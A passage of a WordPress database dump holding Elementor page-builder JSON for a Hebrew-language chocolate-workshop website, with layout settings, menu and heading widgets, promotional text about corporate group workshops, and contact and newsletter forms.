\\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"377296c9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"a673372\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"40017cec\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"23388368\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"Subscribe\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(474,112,'_elementor_version','0.4'),(475,112,'_elementor_template_type','post'),(481,113,'_wp_page_template','elementor_canvas'),(482,113,'_elementor_edit_mode','builder'),(483,113,'_elementor_data','[{\"id\":\"5841dc66\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124}},\"elements\":[{\"id\":\"4504fb06\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"b815b78\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"76b85204\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\"},\"elements\":[{\"id\":\"4855771b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"23c8927c\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"18f6a107\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"305b0fba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"50499c10\",\"elType\":\"widget\",\"settings\":{\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Open Sans Hebrew\",\"typography_font_size\":{\"unit\":\"px\",\"size\":17},\"typography_font_weight\":\"normal\",\"typography_text_decoration\":\"underline\",\"text_color\":\"#54595f\"},\"elements\":[],\"widgetType\":\"breadcrumbs\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4eb9f6ca\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"2d2198b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70},\"elements\":[{\"id\":\"79ff081e\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea, \\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd \\u05d5\\u05e7\\u05d1\\u05d5\\u05e6\\u05d5\\u05ea\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"cdcd955\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/groups-choco.jpg\",\"id\":104},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4d880f94\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>\\u05d0\\u05dd \\u05d0\\u05ea\\u05dd \\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05e7\\u05d7\\u05ea \\u05d9\\u05d5\\u05dd \\u05db\\u05d9\\u05e3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d9\\u05dd \\u05de\\u05d4\\u05e2\\u05d1\\u05d5\\u05d3\\u05d4, \\u05d4\\u05d2\\u05d9\\u05e2 \\u05d4\\u05d6\\u05de\\u05df \\u05dc\\u05d4\\u05db\\u05d9\\u05e8 \\u05d0\\u05ea \\u05d4\\u05de\\u05ea\\u05db\\u05d5\\u05df \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05dd \\u05dc\\u05d0\\u05d9\\u05d2\\u05d5\\u05d3 \\u05d7\\u05d1\\u05e8\\u05d4 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05ea \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8.\\u00a0<\\/strong><\\/p><p>\\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea, \\u05d0\\u05e4\\u05e9\\u05e8 \\u05dc\\u05d0\\u05e8\\u05d2\\u05df \\u05d6\\u05d0\\u05ea \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05db\\u05d6\\u05d5 \\u05e9\\u05d4\\u05d7\\u05d1\\u05e8\\u05d9\\u05dd \\u05d1\\u05e7\\u05d1\\u05d5\\u05e6\\u05d4 \\u05d9\\u05ea\\u05d7\\u05dc\\u05e7\\u05d5 \\u05dc\\u05e7\\u05d1\\u05d5\\u05e6\\u05d5\\u05ea \\u05d5\\u05d9\\u05db\\u05d9\\u05e0\\u05d5 \\u05d9\\u05d7\\u05d3 \\u05d0\\u05ea \\u05d4\\u05de\\u05e0\\u05d5\\u05ea \\u05d4\\u05d0\\u05d4\\u05d5\\u05d1\\u05d5\\u05ea \\u05e2\\u05dc\\u05d9\\u05d4\\u05dd, \\u05d4\\u05d7\\u05dc \\u05de\\u05dc\\u05d8\\u05de\\u05e4\\u05e8\\u05e8 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05d7\\u05d3 \\u05e2\\u05dd \\u05d4\\u05d7\\u05d1\\u05e8\\u05d9\\u05dd \\u05dc\\u05e2\\u05d1\\u05d5\\u05d3\\u05d4 \\u05d5\\u05e2\\u05d3 \\u05dc\\u05e2\\u05e8\\u05d1\\u05d5\\u05d1 \\u05d5\\u05d6\\u05d9\\u05dc\\u05d5\\u05e3 \\u05dc\\u05e2\\u05d5\\u05d2\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05d4\\u05e0\\u05d5\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3. \\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05d8\\u05e2\\u05d9\\u05dd \\u05d9\\u05d7\\u05d3 \\u05e2\\u05dd \\u05d4\\u05d7\\u05d1\\u05e8 \\u05e9\\u05d0\\u05ea\\u05dd \\u05e8\\u05d2\\u05d9\\u05dc\\u05d9\\u05dd \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05d9\\u05ea\\u05d5 \\u05e1\\u05dc\\u05d8, \\u05dc\\u05d0 \\u05d4\\u05d2\\u05d9\\u05e2 \\u05d4\\u05d6\\u05de\\u05df \\u05dc\\u05d3\\u05e2\\u05ea \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d9\\u05d7\\u05d3 \\u05d2\\u05dd \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7?\\u00a0<\\/p><p>\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"fd9ed4d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":30},\"elements\":[{\"id\":\"16c16700\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"76bff3cc\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"field_value\":\"\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width\":\"100\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"_id\":\"field_1\",\"custom_id\":\"field_1\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\\u05d5 \\u05e4\\u05e8\\u05d8\\u05d9\\u05dd\",\"button_icon\":\"fa fa-envelope\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f5a1a2b\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"7dc8b868\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"679b4d51\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"79e92b2c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"1755930a\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f43216a\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"9dc0267\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"22e902c5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"79642803\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"31be803d\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"68a336e5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"5bb3e53\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5b2bedda\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd 